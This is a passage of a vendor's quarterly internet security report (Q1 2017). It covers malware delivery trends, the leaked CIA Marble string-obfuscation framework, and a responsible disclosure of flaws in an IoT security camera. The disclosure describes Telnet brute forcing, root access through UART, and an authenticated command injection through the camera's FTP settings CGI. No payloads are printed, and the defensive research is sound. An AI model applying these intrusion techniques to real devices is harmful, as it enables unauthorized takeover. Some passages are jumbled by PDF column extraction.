Generic36.AAVT is attackers do exploit malicious JavaScript with associated with Bitcoin mining trojans. This threat their web-based EKs, 97.2% of the malicious was the only malware to buck the trend, and JavaScript we saw arrived in email. These not get delivered over email or the web. It was evil emails tend to include compressed Zip almost exclusively FTP-based, with 1 exception attachments, which hide malicious .JS files. As out of 77,704 instances. We’re not entirely sure mentioned in the last report, this is a common why this is; however, many traditional bots did delivery vector for ransomware like Locky. use FTP to download additional payloads. We theorize that this could be another threat adding • Linux malware is sent over the web. In our a bitcoin miner Malware Trends section, we mentioned that we to a victim’s saw a lot of Linux-based threats in Q1. These computer as Linux threats were overwhelmingly delivered over a secondary the web (99.99%), with only eight of the 419,367 payload. instances arriving via email or FTP. This makes sense if you think about how automated Linux and IoT bots work. As seen in the screenshot sample above, many malicious Linux scripts simply use the “wget” command to grab other malicious tools over an everyday web connection.
of the malicious 97.2% JavaScript we saw arrived in email.
Internet Security Report: Q1 2017 • 19 Network Attack Trends
Firebox Feed Statistics Defense Learnings We’ve shared several small defensive tips throughout this section, but here are three defense strategies for some of the top-level trends identified by Q1’s Firebox Feed data:
Harden your Linux servers and IoT devices.
Three, if not four (if you include PERL/ 1 ShellBot) of the top ten Q1 malware variants target Linux systems. We suspect this increase comes from attackers launching automated attacks against weak IoT devices. Manufacturers focusing on usability and affordability over security have released a huge number of incredibly unsecure IoT devices to the masses. Consumers with little security knowledge often connect these devices to the Internet without any firewall, allowing The web battleground has attackers easy access. Open Telnet and SSH shifted towards servers. combined with weak passwords allow attackers to quickly infect swaths of hosts. At the very In Q4, we saw many browser-based attacks. However, least, we recommend you firewall your IoT 2 devices and Linux servers from the Internet. this quarter we saw more web server attacks. Spend some time hardening your web servers, and don’t Avoid opening access to command line forget any other services with web-based interfaces. interfaces without additional authentication Hardening servers involves locking down permissions, or security mechanisms like VPN. Change your limiting resource exposure, and making sure the default passwords and update your software or server’s software is fully patched. You should also firmware as often as possible. audit your web applications for programmatic vulnerabilities. Web application security is a complex topic, but we recommend you visit OWASP.org for a wealth of practical tips.
Traditional AV misses 38% of malware.
For the second quarter in a row, we have seen our legacy AV solution miss a lot of malware that our more advanced solution can catch. In fact, it has gone up from 30% to 38%. Nowadays, cyber criminals use many subtle tricks to repack their malware so that 3 it evades signature-based detection. If you want to block most malware, you need to deploy an advanced malware solution. These anti-malware solutions can often detect never-before-seen zero day malware using more proactive detection techniques, such as behavior analysis and machine learning. If you’re a WatchGuard customer, APT Blocker catches the malware that traditional AV misses. If you don’t have an advanced malware solution, you’ll likely miss more than one third of threats online.
Internet Security Report: Q1 2017 • 20 Top Security Incidents
Internet Security Report: Q1 2017 • 21 Top Security Incidents
Top Security Incidents
Every quarter, several major security stories make the headlines. Some of these stories involve well-known products or services, or simply have a major effect on the security of the overall industry. The media does a great job informing the public of these issues, but they don’t always dig into, or research, the technical details. Our goal with this section of the report is to introduce new research and technical detail that you didn’t already hear from the news, or other research sources. This quarter, we cover the Marble framework from the CIA Vault 7 leaks. The CIA Vault 7 Leaks On March 7, 2017, WikiLeaks began releasing a series of leaks from the U.S. Central Intelligence Agency (CIA) code-named “Vault 7.” The initial leak included descriptions and details of the CIA’s covert hacking program, including stockpiles of zero day exploits. The exploits targeted unpatched vulnerabilities in Android and iPhone devices, Smart TVs, and traditional desktop and server operating systems like Windows, OS X, and Linux.
While the leaks contained many details for ongoing CIA projects, WikiLeaks consciously held back actual source code and proof of concept (POC) exploits from the public, instead offering to share them with affected manufacturers for analysis.
Two weeks after the first Vault 7 leak, WikiLeaks published a second release titled Dark Matter. The Dark Matter release disclosed several rootkit tools the CIA used to gain persistence on Apple computers by infecting the firmware. The leak included the user manual for a modified Thunderbolt-to-Ethernet adapter, code-named the “Sonic Screwdriver,” capable of bypassing EFI/UEFI protections on the target host to facilitate installation of the rootkit. Dark Matter also disclosed similar tools for infecting Apple’s iOS mobile operating system, dating back to 2008.
For sophisticated hackers, covering your tracks is one of the most important parts of an attack. Stealing sensitive information does you no good if investigators can clearly trace the attack back to you. The act of investigating an attack, and analyzing its artifacts is called computer forensics. On March 31, WikiLeaks contin- ued their “Vault 7” leaks with the release of the CIA’s anti-forensics tool, called the Marble framework. The leak included the Marble’s source code and user documentation.
A Technical Analysis of the Marble Framework When malware authors write source code, they often include strings of text along with the regular compu- tational instructions. Such strings can include file paths, Windows registry key names, and sometimes even hard-coded words or passwords. When they compile their source, these strings remain present in the execut- able, for anyone to find.
When analyzing malware, forensic investigators usually first check executables for any human-readable strings, which may provide clues about the malware and its origins. The CIA primarily designed the Marble framework to obfuscate these strings of text, in hopes of preventing investigators from linking CIA malware to a specific developer (i.e. the CIA).
Internet Security Report: Q1 2017 • 22 Top Security Incidents
The framework includes several modules with different purposes. The Mibster module looks for strings marked for obfuscation and performs the actual scrambling. The Validator module checks the compiled executable file and confirms that all the marked strings were successfully scrambled. Finally, the Mender module reverts the source code back to its original state in the event of an error, or if manually requested by the malware author.
To understand the Marble framework, you must first understand how programming languages like C and C++ store strings of text. If you were developing a new ransomware variant, you probably would want to include a function that creates a text file with a ransom note on the victim’s desktop. You might include the string of text, “YOUR FILES ARE ENCRYPTED”, inside this text file. In order for your ransomware to create that note, it would have to include that string of text in its source code.
C and C++ store string variables as an array of individual characters, terminated by a null byte (C++ also includes a variable data type specifically for strings, which we’ll ignore).
Figure 9: String as character array storage example
Each character in the character array takes up 8-bits or 1-byte of memory, which is large enough to store any letter in the English alphabet. Other written languages, such as Cyrillic, require multiple bytes for each char- acter. The wchar_t (wide character) data type allows C and C++ to use 16-bits or 2-bytes of storage for each character. To store the Russian string “шифровать” (roughly “encrypt” in English), we would use an array of wide characters.
Figure 10: String as wide-character array storage example
The Marble framework defines two new data types for string storage. The “CARBLE” data type is 1-byte long and matches up to the original “char” data type, while the “WARBLE” data type is 2-bytes long and matches up to the original “wchar_t” data type. Strings that are defined using the new CARBLE and WARBLE data types are obfuscated by the framework when the source code is compiled into an executable.
Figure 11: Marble framework new string storage data types
When using the Marble framework, a malware author first chooses which of the different obfuscation algo- rithms – or “Marbles” as the CIA calls them – they wish to use. The framework contains 106 different algorithms by default, 48 using C++ and 58 using C. The documentation also includes instructions for adding additional algorithms.
After selecting the pool of obfuscation algorithms, the malware author adds the framework to their project, and includes instructions for the compiler to run Mibster (the obfuscation module) during compilation. Now the malware developer can use the newly defined CARBLE and WARBLE data types to flag strings for obfus- cation by Mibster.
Internet Security Report: Q1 2017 • 23 Top Security Incidents
When the malware author compiles their code, Mibster choses an obfuscation algorithm from the pool, and then notes all the source files containing the CARBLE and WARBLE data types. It creates a “gold copy” (un-modified) of those files to safely revert to the originals in case of an error during obfuscation.
Next, Mibster parses these files, looking for strings using the CARBLE and WARBLE data types. When it locates them, it scrambles the string using the chosen obfuscation algorithms. It replaces the original with a newly scrambled string and an additional de-obfuscation code. The de-obfuscation code allows the compiled executable (malware) to retrieve the original string when it needs it.
After Mibster completes the obfuscation process, the framework validates the output to confirm all the marked strings were scrambled. If it encounters any errors, the Mender module reverts the source code back to its original (using the gold copy files).
In the end, the Marble framework scrambles all the human-readable strings within an executable, making it difficult for a forensic investigator to learn anything about the author from these strings.
Marble Obfuscation Algorithms As for the obfuscation algorithms themselves, each algorithm generates a random key of different sizes depending on the algorithm used.
Figure 12: Obfuscation random key generation
As Mibster feeds a string through the algorithm, it modifies each character using a character from the key. The modification either adds or subtracts the value of the key with the character being modified (bumping), or XORs it (Exclusive OR).
Figure 13: Obfsucation XOR algorithm
As mentioned before, the de-obfuscation code is the internal mechanism that allows the compiled execut- able to read an obfuscated string by returning in to its original state while the program is running. One other difference between the available algorithms is how they implement this de-obfuscation code. Some place the de-obfuscation code alongside the scrambled string as a computational loop, others call a separate function stored elsewhere in the executable.
Figure 14: De-obfuscation code generation
Internet Security Report: Q1 2017 • 24 Top Security Incidents
Marble Framework Defense Learnings
The leaked Marble framework is a fairly complex tool used to throw off savvy forensic investigators, not normal users. However, the average administrator can still draw out a few defensive learnings from this example.
Obfuscation can also help malware hide from detection
There’s a big difference between executable code obfuscation and anti-forensic string obfuscation. The Marble framework provides the latter, and doesn’t really help malware evade detection. It just makes it harder for investigators to attribute the malware. That said, this incident reminds us that criminal attackers also use code obfuscation similarly to hide malware from antivirus (AV) software. 1 Signature-based AV solutions looking for certain code patterns won’t find them if the code is obfuscated. This highlights the necessity for more advanced malware detection solutions, such as behavior-based sandboxes, to detect obfuscated malware.
Beware of false flag attacks in nation-state attacks
The user documentation released in the Vault 7 leak confirms that the Marble obfuscation tools support foreign languages. This suggests that the CIA could 2 leverage this tool to obfuscate their malware to appear like it comes from another country; something experts call a false flag attack. While there is no direct evidence that supports the CIA used Marble in this way, you should be aware of the possibility.
Expect false flags to trickle down to criminal malware
More importantly, be aware that the release of the Marble framework now enables even unsophisticated criminals to obfuscate their malware in a way that could be falsely attributed 3 to the CIA. Malware authors could even backdate the compile timestamp to make their malware appear as though it was created before the public release of the framework. We expect some criminal malware to start using string obfuscation to throw off investigators.
Internet Security Report: Q1 2017 • 25 WatchGuard Threat Lab’s IoT Research Project
Internet Security Report: Q1 2017 • 26 WatchGuard Threat Lab’s IoT Research Project
WatchGuard Threat Lab’s IoT Research Projects
In response to the rapid spread of the Mirai botnet, and the perceived general insecurity of new consumer IoT devices, WatchGuard’s Threat Lab launched an ongoing project to analyze various IoT devices for security flaws. Some of our test targets included Wi-Fi cameras, fitness accessories, and even a wireless egg tray. Any security flaws our researchers find are responsibly disclosed to device manufacturers for patching. Furthermore, we wait 90 days before full disclosure in the event that vendors don’t respond to our disclosure notice.
Responsible Disclosure: Ouvis C2 HD Security Camera
As a part of our ongoing IoT vulnerability research project, one of the recently tested devices included the Ouvis C2 HD Wireless Security Camera. This is a wireless camera that includes Android, iOS and browser-based remote viewing.
Open Telnet Access When first examining new network devices for vulnerabilities, researchers typically start by port scanning the device to identify any open services.
Figure 15: nmap port scan output
In this report, we finally share some zero day vulnerabilities that were discovered in early January. Since the vendor did not respond to our researcher’s disclosure, we had to wait Ouvis C2 HD Security Camera the full 90 days before sharing these details.
Internet Security Report: Q1 2017 • 27 WatchGuard Threat Lab’s IoT Research Project
A port scan of the Ouvis camera showed open Telnet on TCP/23 and an HTTP web server running on TCP/81 – a non-standard port for web servers. We immediately noted the open Telnet access as a potential security vulnerability, since Telnet offers no encryption. There is no reason for consumer IoT devices to allow Telnet-based management access, especially when more secure options like SSH exist. Malicious applications like the Mirai botnet thrive because of open Telnet access combined with weak default passphrases.
After detecting an open Telnet port, a penetration (pen) tester typically tries to obtain privileged command-line access to the device through Telnet. To gain such access, the pen tester needs to figure out the username and password for the ‘root’ account on the device. Since these CLI interfaces are often left in for diagnostic purposes, manufacturers don’t share credentials for them, and don’t necessarily intend them for the customer’s use.
Brute forcing to the rescue. In respect to authentication, a brute force attack is the act of rapidly trying different username and password combinations against a login. Using an application called THC Hydra, our researcher at- tempted to brute force the credentials for the device. To speed up the attack, he configured Hydra to use a wordlist containing thousands of common passphrases. After several hours of trying different username name and password combinations, Hydra was unable to find working credentials.
Figure 16: hydra password brute force via
After failing to brute force credentials, the threat research team was forced to find other methods for obtaining root access. The next step involved disassembling the camera in search of console serial access. Luckily, one of the circuit boards in the camera had UART pads.
Figure 17: Empty UART pads Internet Security Report: Q1 2017 • 28 WatchGuard Threat Lab’s IoT Research Project
After soldering a USB-TTY to UART cable to the empty pads, the team could access the camera’s serial console (115200 baud rate).
Figure 18: Camera U-Boot output
After halting the boot process, our researcher modified the U-Boot configuration to initialize a shell after mounting the filesystem.
Figure 19: Modifying the U-Boot configuration
Our researcher was finally greeted with a command line shell for the camera. Once connected, he checked /etc/passwd for any user accounts and easily found the root account and its hashed password.
Figure 20: Hashed root password
Internet Security Report: Q1 2017 • 29 Summary
Access to a password hash allows for faster, more efficient offline password cracking. In one last attempt to obtain the root password, our team fed the passwd file through hashcat, a popular hash cracking application. After several days of cracking, attempting every possible character combination up to and including eight characters, hashcat failed to yield any results.
We still consider this open Telnet access a weakness, especially since the device includes a hard-coded root password (which some might call a backdoor account). The good news is the root password has withstood several significant cracking attempts so far. It seems the device manufacturer was at least conscious enough to use a strong password. That said, if anyone ever recovers this password, it could provide a backdoor to all these devices. In fact, we have since correlated with other researchers’ analysis, and have confirmed that all these Ouvis cameras share the same root pass- word hash. If the password ever leaks, it will provide attackers with unrestricted access to these devices.
Authenticated Remote Code Execution Vulnerability In auditing IoT devices like webcams, our research team frequently finds web application flaws in web management portals due to un-sanitized inputs. After finding a remote code execution vulnerability in one of the web management pages of a similar IoT camera, the team checked the same location (FTP backup settings) for this Ouvis camera, and found the exact same vulnerability (see our Q4 report for more details on the previous issue).
Figure 21: Hashed root password
A packet capture of DNS traffic from the camera showed an attempted name resolution for ‘rce.bad’, confirming the remote code execution vulnerability.
As it turned out, the Common Gateway Interface (CGI) handler for FTP configuration (set_ftp.cgi) did not sanitize the user input before saving it to an FTP upload script located at /tmp/ftpupload.sh. The camera runs this script as a privileged user, which in turn executes any command an attacker injects into this un-sanitized input (in our example, the ping command).
This serious vulnerability could allow attackers to execute any command on this camera as root, thus elevating their privileges. However, this is an “authenticated” vulnerability, meaning the attacker must already have valid management credentials in order to exploit this flaw.
Conclusion After confirming both vulnerabilities, our researchers immediately submitted a report to Ouvis via their support contact. Ouvis did not respond to our disclosure attempts over a 90-day period.
After 60 days, a separate researcher disclosed the same, and further vulnerabilities in a series of cameras appearing to be manufactured by the same OEM supplier. Because the Ouvis C2 was not present in Pierre Kim’s list of affected models, we continued the originally planned 90-day disclosure period. After no contact from the vendor, we responsibly disclosed this research publicly on April 24, 2017.
Timeline • 2 January 2017 – Vulnerabilities discovered • 4 January 2017 – Reported to manufacturer • 3 February 2017 – Manufacturer contacted a second time • 6 March 2017 – Manufacturer informed of imminent public disclosure • 8 March 2017 – Similar vulnerabilities zero day’d by Pierre Kim • 3 April 2017 – Manufacturer contacted a final time • 24 April 2017 – Public Disclosure Internet Security Report: Q1 2017 • 30 WatchGuard Threat Lab’s IoT Research Project
WatchGuard Threat Lab’s Research Defense Learnings
Our research shows consumer IoT devices continue to ship with weaknesses and security vulnerabilities. At best, these issues could result in loss of privacy for consumers. At worst, they might allow attackers to take over these devices, gaining a foothold into your internal network.
Consumers should take steps to secure the IoT devices they purchase, as well as urge device manufacturers to focus on security. At a minimum, here are three IoT defense strategies that help.
Change default passwords Avoid exposing 1 IoT manufacturers often hardcode weak or non-existent passwords to CLI management make their products easier to use (at interfaces to the the risk of security). When first setting Internet up a new IoT device your first task 2 should be setting new, difficult-to- Most IoT devices have no legitimate guess passwords wherever possible. need for CLI access via Telnet or SSH. If you port scan your IoT device and find open CLI access, take extra caution while deploying it. Implement network firewall rules to block inbound Telnet and SSH access not only from the Internet, but from other internal networks as well (to prevent attack Avoid IoT devices pivoting). with hard-coded backdoor accounts 3 Some manufacturers ship IoT devices with set accounts that have the same hard-cod- ed password for all devices. If consumers are unaware of the account, it’s essential- ly a backdoor. Before purchasing an IoT device, research the manufacturer’s history in securing their products. Avoid vendors that are known to include hard-coded backdoor accounts in their IoT devices.
Internet Security Report: Q1 2017 • 31 Defense Highlights
Internet Security Report: Q1 2017 • 32 Defense Highlights
Conclusion & Defense Highlights One lesson you learn if you follow any trend over time is things change. Sometimes they change at a glacial pace, so slowly that you may not notice the alterations. Other times they change overnight, so quickly that you can’t get your bearings straight. This constant change applies directly to the threat and security landscape as well.
This quarter, we saw some of the same malware and That’s the whole point of this quarterly security network attacks retain their place on our top threat report – to prepare you for change in the threat lists. However, we also saw new threats and exploits landscape. By staying current with the latest threat replace the old ones. For instance, macro malware trends, you can adapt your technical and social se- – a top threat from Q4 2016 – dropped off our list, curity strategies to defend against evolving threats. becoming less relevant in Q1. Meanwhile, we saw Throughout this report, we shared detailed defense three times as much Linux malware as we did before, lessons for the individual trends we identified. We’ll suggesting attackers have increased their efforts to end with a few final high-level defense strategies target IoT. every organization should consider.
When change happens unexpectedly, it feels scary, and can cause unforeseen surprises that hurt when they hit you unprepared. However, change doesn’t have to be scary. In fact, when you vigilantly monitor change, you can adapt and prepare for it, protecting yourself from unanticipated consequences.
Macro malware – a top threat from Q4 2016 – dropped of our list, becoming less relevant in Q1. Meanwhile, we saw three times as much Linux malware as we did before, suggesting attackers have increased their efforts to target IoT.
Internet Security Report: Q1 2017 • 33 Defense Highlights
Basic security policies still block many threats Security experts often spend much of their time talking about the most sophisticated threats. We get excited about new zero day exploits, the latest kernel rootkits, and other never-before-seen attacks and evasion techniques. From a security expert’s perspec- tive, it makes sense to focus on the more interesting, advanced threats, which will surely become more common in the future. However, our data shows that the top threats aren’t always new or sophisticated. In fact, most of the popular network attacks we saw this quarter exploited old vulnerabilities that were patched long ago. Many of the top malware samples we identified were well-known examples, which attackers have used for years. Even the vulnerabilities we found in IoT devices were very standard weakness- es that have simple solutions. The point is, you can prevent a significant slice of these threats just by following some basic security practices. Patch your software often. Avoid opening unsolicited files, or clicking unexpected links. Firewall your IoT devices. These simple practices still do help. Basic firewalls are incomplete without other security layers Firewalls remain a critical part of our security infrastructure. You must limit the network services you expose to the Internet (as proven with unsecure IoT devices). However, a firewall alone is not enough. Today, most attacks don’t target exposed services directly, but rather target your users instead. Even with a firewall, almost all organizations open holes allowing their users to reach the web, get email, or transfer files (among other things). To protect against today’s client-side attacks, you must also implement a suite of security services, such as intrusion prevention, anti-malware, IP and URL filtering, and more to monitor the services you allow through your firewall for malicious activity. If you don’t yet have a layered security strategy, consider a unified threat management platform that combines basic firewalling with many other layers of protection.
Segment and harden your IoT devices In the current state of the industry, IoT devices can’t yet be trusted. While there are certainly exceptions, our research, as well as other industry research, suggests the vast majority of IoT devices have major security weaknesses, and can pose a threat to the rest of your network. You might presume criminals don’t care about your webcams, refrigerators, or DVRS, but attackers known they can use these local devices to reach more important computers in your network. Since manufacturers are shipping these devices with vulnerabilities, it’s up to you to secure them. First, firewall IoT devices from the Internet and only expose necessary services. In fact, we recommend you segment them on your internal network, too. That way if someone hijacks your IoT device, they don’t immediately gain access to everything else. Finally, remember to change default passwords, disable unnecessary services, and patch these products as often as possible.
Invest in advanced malware prevention We said it last quarter, and it remains true this quarter; if you don’t have an advanced malware protection solution, you will eventually get infected. While many of the threats we see are well known, it’s clear attackers regularly repackage their old malware to evade pattern-based detection. This quarter we learned that 38% – over one third – of the malware we detected got past legacy signature-based AV solutions. The industry has long understood the weakness in reactive, pattern-based AV, but this problem has reached a critical mass. More and more victims are getting infected with threats like ransomware despite having basic protection. To catch today’s more evasive malware, you need solutions that use more proactive detection techniques, such as behavioral analysis, or machine learning and big data analytics. We recommend you invest in an advanced malware solution. If you’re a WatchGuard customers, our APT Blocker and Threat Detection and Response offerings provide this service.
Internet Security Report: Q1 2017 • 34 Summary
If you made it this far, thank you for reading our report to the end. We hope you found the trends and analysis enlightening, and use these learnings to protect your networks and organizations. Feel free to share any feed- back you have about the report with [email protected], and join us next quarter.
Corey Nachreiner Chief Technology Officer
Recognized as a thought leader in IT security, Nachreiner spearheads WatchGuard’s technology vision and direction. Previously, he was the director of strategy and research at WatchGuard. Nachreiner has operated at the frontline of cyber security for 16 years, and for nearly a decade has been evaluating and making accurate predictions about information security trends. As an authority on network security and internationally quoted commentator, Nachreiner’s expertise and ability to dissect complex security topics make him a sought-after speaker at forums such as Gartner, Infosec and RSA. He is also a regular contributor to leading publications including CNET, Dark Reading, eWeek, Help Net Security, Information Week and Infosecurity, and delivers WatchGuard’s “Daily Security Byte” video on Facebook.
Marc Laliberte Security Threat Analyst
Specializing in network security technologies, Marc’s industry experience allows him to conduct meaningful information security research and educate audiences on the latest cyber security trends and best practices. With speaking appearances at IT conferences and regular contributions to online IT and security publications, Marc is a security expert who enjoys providing unique insights and guidance to all levels of IT personnel.
About WatchGuard Threat Lab WatchGuard’s Threat Lab (previously the LiveSecurity Threat Team) is a group of dedicated threat researchers committed to discovering and studying the latest malware and Internet attacks. The Threat Lab team analyzes data from WatchGuard’s Firebox Feed, internal and partner threat intelligence, and a research honeynet, to provide insightful analysis about the top threats on the Internet. Their smart, practical security advice will enable you to better protect your organization in the ever-changing threat landscape.
About WatchGuard Technologies WatchGuard® Technologies, Inc. is a global leader in network security, providing best-in-class Unified Threat Management, Next Generation Firewall, secure Wi-Fi, and network intelligence products and services to more than 80,000 customers worldwide. The company’s mission is to make enterprise-grade security accessible to companies of all types and sizes through simplicity, making WatchGuard an ideal solution for distributed enterprises and SMBs. WatchGuard is headquartered in Seattle, Washington, with offices throughout North America, Europe, Asia Pacific, and Latin America. To learn more, visit WatchGuard.com.
For additional information, promotions and updates, follow WatchGuard on Twitter @WatchGuard, on Facebook, and on the LinkedIn Company page. Also, visit our InfoSec blog, Secplicity, for real-time information about the latest threats and how to cope with them at www.secplicity.org.
© 2017 WatchGuard Technologies, Inc. All rights reserved. WatchGuard, the WatchGuard logo, LiveSecurity, and Firebox are registered trademarks of WatchGuard Technologies, Inc. in the United States and/or other countries. All other tradenames are the property of their respective owners. Part No. WGCE67003_062017